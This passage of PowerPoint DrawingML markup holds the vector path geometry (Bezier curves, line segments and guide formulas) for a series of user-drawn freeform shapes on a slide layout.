                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="198"/>
                      <a:pt x="72" y="199"/>
                      <a:pt x="68" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="203"/>
                      <a:pt x="64" y="204"/>
                      <a:pt x="63" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="208"/>
                      <a:pt x="53"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6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="162"/>
                      <a:pt x="3" y="160"/>
                      <a:pt x="7" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="160"/>
                      <a:pt x="12" y="160"/>
                      <a:pt x="14" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="158"/>
                      <a:pt x="22" y="155"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="149"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="153"/>
                      <a:pt x="23" y="160"/>
                      <a:pt x="17" y="161"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="162"/>
                      <a:pt x="12" y="162"/>
                      <a:pt x="9" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="162"/>
                      <a:pt x="9" y="162"/>
                      <a:pt x="9" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="162"/>
                      <a:pt x="3" y="164"/>
                      <a:pt x="4" y="168"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="169"/>
                      <a:pt x="5" y="171"/>
                      <a:pt x="6" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="176"/>
                      <a:pt x="8" y="180"/>
                      <a:pt x="6" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="185"/>
                      <a:pt x="5" y="186"/>
                      <a:pt x="4" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="190"/>
                      <a:pt x="4" y="191"/>
                      <a:pt x="6" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="193"/>
                      <a:pt x="11" y="194"/>
                      <a:pt x="13" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="196"/>
                      <a:pt x="35" y="199"/>
                      <a:pt x="45" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="203"/>
                      <a:pt x="52" y="204"/>
                      <a:pt x="55" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="202"/>
                      <a:pt x="66" y="197"/>
                      <a:pt x="64" y="190"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="186"/>
                      <a:pt x="62" y="182"/>
                      <a:pt x="60" y="179"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="170"/>
                      <a:pt x="49" y="160"/>
                      <a:pt x="42" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="149"/>
                      <a:pt x="37" y="147"/>
                      <a:pt x="35" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="143"/>
                      <a:pt x="29" y="143"/>
                      <a:pt x="27" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="145"/>
                      <a:pt x="25" y="145"/>
                      <a:pt x="25" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="140"/>
                      <a:pt x="24" y="137"/>
                      <a:pt x="25" y="134"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="132"/>
                      <a:pt x="26" y="131"/>
                      <a:pt x="27" y="130"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="125"/>
                      <a:pt x="32"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0" y="23"/>
                      <a:pt x="122" y="30"/>
                      <a:pt x="122" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="40"/>
                      <a:pt x="122" y="43"/>
                      <a:pt x="123" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="124" y="61"/>
                      <a:pt x="128" y="74"/>
                      <a:pt x="138" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="97"/>
                      <a:pt x="156" y="112"/>
                      <a:pt x="159" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="133"/>
                      <a:pt x="161" y="138"/>
                      <a:pt x="160" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="144"/>
                      <a:pt x="159" y="145"/>
                      <a:pt x="159" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="158" y="147"/>
                      <a:pt x="158" y="148"/>
                      <a:pt x="157" y="148"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="155" y="149"/>
                      <a:pt x="154" y="150"/>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8"/>
                      <a:pt x="122" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="189"/>
                      <a:pt x="121" y="191"/>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1"/>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0"/>
                      <a:pt x="160" y="158"/>
                      <a:pt x="160" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="154"/>
                      <a:pt x="160" y="154"/>
                      <a:pt x="161" y="153"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="71" y="69"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="71"/>
                      <a:pt x="74" y="73"/>
                      <a:pt x="77" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="74"/>
                      <a:pt x="85" y="73"/>
                      <a:pt x="88" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="70"/>
                      <a:pt x="94" y="68"/>
                      <a:pt x="97" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="98" y="66"/>
                      <a:pt x="100" y="66"/>
                      <a:pt x="101" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="65"/>
                      <a:pt x="102" y="66"/>
                      <a:pt x="102" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="67"/>
                      <a:pt x="102" y="68"/>
                      <a:pt x="101" y="68"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="68"/>
                      <a:pt x="100" y="69"/>
                      <a:pt x="99" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="94" y="71"/>
                      <a:pt x="90" y="74"/>
                      <a:pt x="86" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="78"/>
                      <a:pt x="83" y="80"/>
                      <a:pt x="81" y="81"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="82"/>
                      <a:pt x="75" y="82"/>
                      <a:pt x="73" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="77"/>
                      <a:pt x="69" y="74"/>
                      <a:pt x="67" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="71"/>
                      <a:pt x="66" y="70"/>
                      <a:pt x="65" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="70"/>
                      <a:pt x="65" y="70"/>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99"/>
                      <a:pt x="56" y="100"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="104"/>
                      <a:pt x="51" y="108"/>
                      <a:pt x="50" y="112"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="117"/>
                      <a:pt x="46" y="122"/>
                      <a:pt x="46" y="127"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="130"/>
                      <a:pt x="46" y="133"/>
                      <a:pt x="46" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="137"/>
                      <a:pt x="45" y="139"/>
                      <a:pt x="45" y="140"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="141"/>
                      <a:pt x="43" y="142"/>
                      <a:pt x="42" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="140"/>
                      <a:pt x="41" y="139"/>
                      <a:pt x="40" y="138"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="134"/>
                      <a:pt x="37" y="129"/>
                      <a:pt x="37" y="125"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="123"/>
                      <a:pt x="38" y="122"/>
                      <a:pt x="38" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="121"/>
                      <a:pt x="38" y="121"/>
                      <a:pt x="38" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="122"/>
                      <a:pt x="37" y="122"/>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69"/>
                      <a:pt x="69" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="175"/>
                      <a:pt x="67" y="176"/>
                      <a:pt x="64" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="178"/>
                      <a:pt x="63" y="178"/>
                      <a:pt x="62" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="180"/>
                      <a:pt x="64" y="181"/>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3" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="114" y="173"/>
                      <a:pt x="115" y="172"/>
                      <a:pt x="115" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="116" y="173"/>
                      <a:pt x="116" y="174"/>
                      <a:pt x="117" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="178"/>
                      <a:pt x="116" y="182"/>
                      <a:pt x="115" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="188"/>
                      <a:pt x="114" y="190"/>
                      <a:pt x="113"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5" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="126" y="146"/>
                      <a:pt x="126" y="146"/>
                      <a:pt x="126" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="142"/>
                      <a:pt x="129" y="140"/>
                      <a:pt x="132" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="137" y="138"/>
                      <a:pt x="141" y="138"/>
                      <a:pt x="146" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="138"/>
                      <a:pt x="142" y="137"/>
                      <a:pt x="140" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="119"/>
                      <a:pt x="135" y="97"/>
                      <a:pt x="126" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="97"/>
                      <a:pt x="134" y="103"/>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2" y="103"/>
                      <a:pt x="121" y="98"/>
                      <a:pt x="117" y="95"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="95"/>
                      <a:pt x="117" y="94"/>
                      <a:pt x="117" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="86"/>
                      <a:pt x="112" y="79"/>
                      <a:pt x="107" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="70"/>
                      <a:pt x="105" y="67"/>
                      <a:pt x="105"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7"/>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7" y="44"/>
                      <a:pt x="107" y="40"/>
                      <a:pt x="105" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="32"/>
                      <a:pt x="100" y="29"/>
                      <a:pt x="96" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="30"/>
                      <a:pt x="88" y="33"/>
                      <a:pt x="87" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="39"/>
                      <a:pt x="86" y="40"/>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6" y="33"/>
                      <a:pt x="65" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="40"/>
                      <a:pt x="63" y="45"/>
                      <a:pt x="66" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="50"/>
                      <a:pt x="67" y="51"/>
                      <a:pt x="68" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="51"/>
                      <a:pt x="69" y="50"/>
                      <a:pt x="69" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="48"/>
                      <a:pt x="68" y="48"/>
                      <a:pt x="67" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="45"/>
                      <a:pt x="65" y="42"/>
                      <a:pt x="66" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="37"/>
                      <a:pt x="71" y="36"/>
                      <a:pt x="73" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74"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0" y="66"/>
                      <a:pt x="74" y="66"/>
                      <a:pt x="78" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="66"/>
                      <a:pt x="86" y="65"/>
                      <a:pt x="91" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="94" y="62"/>
                      <a:pt x="98" y="62"/>
                      <a:pt x="101" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="58"/>
                      <a:pt x="102" y="58"/>
                      <a:pt x="103" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="59"/>
                      <a:pt x="103" y="60"/>
                      <a:pt x="103" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="61"/>
                      <a:pt x="102" y="61"/>
                      <a:pt x="102" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="96" y="63"/>
                      <a:pt x="91" y="65"/>
                      <a:pt x="86" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="69"/>
                      <a:pt x="78"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1" y="43"/>
                      <a:pt x="71" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="45"/>
                      <a:pt x="72" y="45"/>
                      <a:pt x="73" y="45"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="97" y="39"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="40"/>
                      <a:pt x="99" y="42"/>
                      <a:pt x="100" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="43"/>
                      <a:pt x="101" y="43"/>
                      <a:pt x="101" y="43"/>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Freeform 52"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4077" y="224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Freeform 53"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4089" y="2249"/>
                <a:ext cx="4" cy="1"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3"/>
                  <a:gd name="T1" fmla="*/ 0 h 1"/>
                  <a:gd name="T2" fmla="*/ 3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1"/>
                      <a:pt x="3"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Freeform 54"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="20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Freeform 55"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="222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Freeform 56"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="242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Freeform 57"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2620"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Freeform 58"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2770"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Freeform 59"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2918"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4"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Freeform 60"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="311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Freeform 61"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="326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Freeform 62"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="345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Freeform 63"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3656"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Freeform 64"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3805" y="2929"/>
                <a:ext cx="155" cy="248"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 127 w 127"/>
                  <a:gd name="T1" fmla="*/ 100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Freeform 65"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3989" y="2933"/>
                <a:ext cx="189" cy="218"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 189 w 189"/>
                  <a:gd name="T1" fmla="*/ 67 h 218"/>
                  <a:gd name="T2" fmla="*/ 185 w 189"/>
                  <a:gd name="T3" fmla="*/ 84 h 218"/>
                  <a:gd name="T4" fmla="*/ 141 w 189"/>
                  <a:gd name="T5" fmla="*/ 84 h 218"/>
                  <a:gd name="T6" fmla="*/ 132 w 189"/>
                  <a:gd name="T7" fmla="*/ 134 h 218"/>
                  <a:gd name="T8" fmla="*/ 178 w 189"/>
                  <a:gd name="T9" fmla="*/ 134 h 218"/>
                  <a:gd name="T10" fmla="*/ 173 w 189"/>
                  <a:gd name="T11" fmla="*/ 152 h 218"/>
                  <a:gd name="T12" fmla="*/ 128 w 189"/>
                  <a:gd name="T13" fmla="*/ 152 h 218"/>
                  <a:gd name="T14" fmla="*/ 113 w 189"/>
                  <a:gd name="T15" fmla="*/ 218 h 218"/>
                  <a:gd name="T16" fmla="*/ 93 w 189"/>
                  <a:gd name="T17" fmla="*/ 218 h 218"/>
                  <a:gd name="T18" fmla="*/ 106 w 189"/>
                  <a:gd name="T19" fmla="*/ 152 h 218"/>
                  <a:gd name="T20" fmla="*/ 65 w 189"/>
                  <a:gd name="T21" fmla="*/ 152 h 218"/>
                  <a:gd name="T22" fmla="*/ 51 w 189"/>
                  <a:gd name="T23" fmla="*/ 218 h 218"/>
                  <a:gd name="T24" fmla="*/ 30 w 189"/>
                  <a:gd name="T25" fmla="*/ 218 h 218"/>
                  <a:gd name="T26" fmla="*/ 44 w 189"/>
                  <a:gd name="T27" fmla="*/ 152 h 218"/>
                  <a:gd name="T28" fmla="*/ 0 w 189"/>
                  <a:gd name="T29" fmla="*/ 152 h 218"/>
                  <a:gd name="T30" fmla="*/ 4 w 189"/>
                  <a:gd name="T31" fmla="*/ 134 h 218"/>
                  <a:gd name="T32" fmla="*/ 47 w 189"/>
                  <a:gd name="T33" fmla="*/ 134 h 218"/>
                  <a:gd name="T34" fmla="*/ 58 w 189"/>
                  <a:gd name="T35" fmla="*/ 84 h 218"/>
                  <a:gd name="T36" fmla="*/ 12 w 189"/>
                  <a:gd name="T37" fmla="*/ 84 h 218"/>
                  <a:gd name="T38" fmla="*/ 16 w 189"/>
                  <a:gd name="T39" fmla="*/ 67 h 218"/>
                  <a:gd name="T40" fmla="*/ 61 w 189"/>
                  <a:gd name="T41" fmla="*/ 67 h 218"/>
                  <a:gd name="T42" fmla="*/ 75 w 189"/>
                  <a:gd name="T43" fmla="*/ 0 h 218"/>
                  <a:gd name="T44" fmla="*/ 96 w 189"/>
                  <a:gd name="T45" fmla="*/ 0 h 218"/>
                  <a:gd name="T46" fmla="*/ 83 w 189"/>
                  <a:gd name="T47" fmla="*/ 67 h 218"/>
                  <a:gd name="T48" fmla="*/ 124 w 189"/>
                  <a:gd name="T49" fmla="*/ 67 h 218"/>
                  <a:gd name="T50" fmla="*/ 139 w 189"/>
                  <a:gd name="T51" fmla="*/ 0 h 218"/>
                  <a:gd name="T52" fmla="*/ 160 w 189"/>
                  <a:gd name="T53" fmla="*/ 0 h 218"/>
                  <a:gd name="T54" fmla="*/ 145 w 189"/>
                  <a:gd name="T55" fmla="*/ 67 h 218"/>
                  <a:gd name="T56" fmla="*/ 189 w 189"/>
                  <a:gd name="T57" fmla="*/ 67 h 218"/>
                  <a:gd name="T58" fmla="*/ 121 w 189"/>
                  <a:gd name="T59" fmla="*/ 84 h 218"/>
                  <a:gd name="T60" fmla="*/ 79 w 189"/>
                  <a:gd name="T61" fmla="*/ 84 h 218"/>
                  <a:gd name="T62" fmla="*/ 68 w 189"/>
                  <a:gd name="T63" fmla="*/ 134 h 218"/>
                  <a:gd name="T64" fmla="*/ 111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7"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="185" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="67"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="121" y="84"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="79" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111"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Freeform 66"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4207" y="2929"/>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2"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Freeform 67"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4402" y="2929"/>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Freeform 68"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4600" y="292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Freeform 69"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="474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Freeform 70"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4942"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Freeform 71"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5137"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72"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="533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Freeform 73"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5483"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74"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5680" y="292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5"/>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Freeform 75"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5830" y="292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Freeform 76"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="597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3"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Freeform 77"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="617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Freeform 78"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="632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Freeform 79"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="651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Freeform 80"/>
